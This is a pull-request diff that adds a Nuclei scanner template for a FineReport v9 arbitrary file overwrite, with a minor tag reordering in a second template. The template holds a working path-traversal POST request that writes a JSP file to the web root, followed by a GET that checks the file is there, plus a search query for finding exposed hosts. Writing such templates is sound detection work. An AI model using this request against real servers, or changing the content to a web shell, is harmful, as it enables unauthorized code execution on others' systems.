Merge pull request #8057 from projectdiscovery/princechaddha-patch-3

Create fine-report-v9-file-upload.yaml

http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml

@@ -0,0 +1,34 @@
+id: fine-report-v9-file-upload
+
+info:
+  name: FineReport v9 Arbitrary File Overwrite
+  author: SleepingBag945
+  severity: critical
+  reference:
+    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
+  metadata:
+    fofa-query: app="帆软-FineReport"
+  tags: finereport,fileupload,intrusive
+
+variables:
+  string: '{{rand_base(8, "abc")}}'
+  filename: '{{rand_base(8)}}'
+
+http:
+  - raw:
+      - |
+        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml;charset=UTF-8
+
+        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
+
+      - |
+        GET /WebReport/{{filename}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "{{string}}"

http/vulnerabilities/finereport/finereport-path-traversal.yaml

@@ -11,9 +11,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cwe-id: CWE-22
-  tags: finereport,lfi
   metadata:
     max-request: 2
+  tags: finereport,lfi
 
 http:
   - method: GET